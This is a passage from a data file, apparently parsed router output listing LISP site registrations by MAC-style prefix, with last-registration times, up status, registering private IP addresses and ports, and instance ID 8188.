"inst_id": 8188,
},
"a4b2.39ff.1cc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.1ccc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1cd4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.1cd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1cdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.1ce0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.1ce4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1ce8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.1cf8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1cfc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1c05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1d08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d0c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1d10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d1c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1d20/48": {
"last_register": "2d17h",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d24/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1d38/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1d3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1d44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1d48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.1d5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1d64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1d6c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1d70/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.1d74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1d78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1d7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.1d80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1d84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.1d8c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1d90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1d94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.1d98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.1d9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.1dac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1db0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.1db4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.1dbc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1dc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1dc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1dd4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1ddc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1de0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.1de4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.1dec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1df8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.1d01/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1d05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1e08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1e20/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1e30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.1e34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.1e40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.1e50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1e54/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.1e60/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.1e68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.1e70/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.1ea0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1eb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1fc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.2018/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.2024/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2028/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2040/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2054/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2058/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.2114/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.2134/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.21e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.21f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2228/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2240/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.2248/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.2254/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.2284/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2288/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2294/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.2298/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.22b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.22e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.22e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.22e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.22ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.22f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.2205/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.2310/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.2318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.2320/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.2324/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"a4b2.39ff.24a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.24b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.263c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.264c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.2668/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.266c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.2678/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.267c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2688/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.268c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.26a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.26ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.26e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.26f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.26f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.2714/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.272c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.2734/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.2750/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.2764/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.2774/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.2778/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.2cd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.2d8c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.2e7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.31dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.34cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.34f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.3984/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.3ba4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.3bac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.3bb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.3bb4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.3bc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.3bcc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.3bd0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4430/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.4534/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.46a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4720/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4724/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4728/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4734/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.4738/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4750/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.475c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.47c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.47c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.47c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.47d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.47d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.47e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.47e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.47ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.47f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.47fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.4701/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4705/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4810/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.4814/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.4818/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.481c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.4820/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.4824/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.482c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4830/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4834/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4838/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.483c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.4840/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4844/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4848/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.484c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.4850/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4854/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.4858/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.485c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4860/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4864/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4868/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.486c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.4870/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.4874/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4878/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.487c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4884/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4888/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4890/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4898/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.489c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.48a0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.48a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.48ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.48b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.48b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.48b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.48bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.48c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.48c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.48cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.48d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.48d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.48d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.48dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.48e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.48e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.48e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.48f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.48f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.48f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.48fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
